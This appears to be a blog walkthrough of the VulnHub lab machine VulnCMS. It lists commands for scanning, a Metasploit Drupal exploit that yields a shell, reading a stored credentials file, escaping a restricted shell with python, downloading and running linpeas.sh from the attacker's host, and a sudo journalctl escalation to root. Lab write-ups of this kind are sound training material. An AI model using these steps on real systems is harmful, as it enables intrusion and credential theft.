VulnCMS Walkthrough – Vulnhub – Writeup

VulnCMS Walkthrough – Vulnhub – Writeup. The machine VulnCMS is an easy machine to root. Also, it takes some time to enumerate which is fairly easy.

The link to the machine: https://www.vulnhub.com/entry/vulncms-1,710/

Walkthrough of Nagini from harry potter series

Identify the target

Firstly, I identified the IP address of the target machine.

sudo netdiscover -i eth0 -r 10.0.2.0/24

Scan open ports

Now that I have identified the target, I have to scan for open ports on the machine to find the exposed services.

nmap -T4 -sC -sV -p- --min-rate=1000 10.0.2.30 -oN vulncms.nmap

Enumerate CMS

From the screenshot above, we can see that different CMS’ from wordpress, joomla and drupal are hosted on different ports. Hence, I decided to enumerate all of them. Also, from this result, we see that we have an older version of drupal. However, when I did the enumeration, I started with WordPress. Also, when we surf the websites, we can see that the host is fsociety.web.

sudo vi /etc/hosts
wpscan --api-token=$WPSCAN_KEY --url http://fsociety.web:5000/ --plugins-detection mixed -e -o tee vulncms.wpscan

Here, we can see that we don’t have any known vulnerable plugins. Hence, I moved to joomla CMS.

From this result, we don’t have any vulnerabilities on drupal. Lastly, I moved to drupal.

drupwn --target http://fsociety.web:9001 --mode enum

There was a very famous exploit for versions less than 7.58 of drupal. So, I switched to metasploit framework to exploit the CMS.

msfconsole
search drupal
use 1
set rhosts 10.0.2.30
set rport 9001
set vhost fsociety.web
exploit

Finally, we got the shell.

Privilege escalation to user

Since, we have got access to the machine, now we can search for database credentials. However, it’s not the ultimate way. There is a file in /opt directory, that revealed us the credentials of joomla cms.

cd /opt
cat 8081.cred

Using these credentials, we can login to the joomla CMS and get the user’s list. On the user’s list, we have a user elliot, whose email looks like password of the user for the target machine.

However, we can get this information after getting database credentials from different directory inside /var/www/html directory.

Finally, I could log in using this information.

ssh elliot@10.0.2.30

Like this, I got the user flag.

Privilege escalation to root

Since we have access to the user, we can check for different access he has.

Unfortunately, the user’s shell was rbash which refers to restricted bash. Therefore, I had to find a way to spawn a regular bash. Upon researching for some modules, I found out that it has python3 available to the user. So, I could spawn another shell using python3.

python3 -c 'import pty;pty.spawn("/bin/bash")'

You can see that I can change to the root of the filesystem now. Thus, I can move for further enumeration. Although I tried basic stuff like sudo permissions, SUID binaries, cron jobs using pspy, etc, I couldn’t find anything. Then, I decided to get the linpeas.sh in the target machine and had to look at the output many times.

From the directory where I have linpeas.sh.

python3 -m http.server

On target machine:

wget http://10.0.2.15:8000/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh | tee output # you can look at output after 2 days. xD

After looking for about 1 hour, I got the following.

From the screenshot above, I got the password of the second user tyrell. So, I SSH logged in as him.

ssh tyrell@10.0.2.30
sudo -l

The user tyrell had access on a binary that we can exploit.

Reference: https://gtfobins.github.io/gtfobins/journalctl/

sudo journalctl
!/bin/bash
id
cd /root
cat root.txt

In this way, we can root the machine.

Conclusion

This is a fairly easy machine as I told you earlier. However, the last part was a bit tricky because it needs a very subtle observation. However, the exploits are pretty common and easy to perform. Additionally, I would like to thank Simardeep Singh for the machine. I really appreciate it.

Leave a comment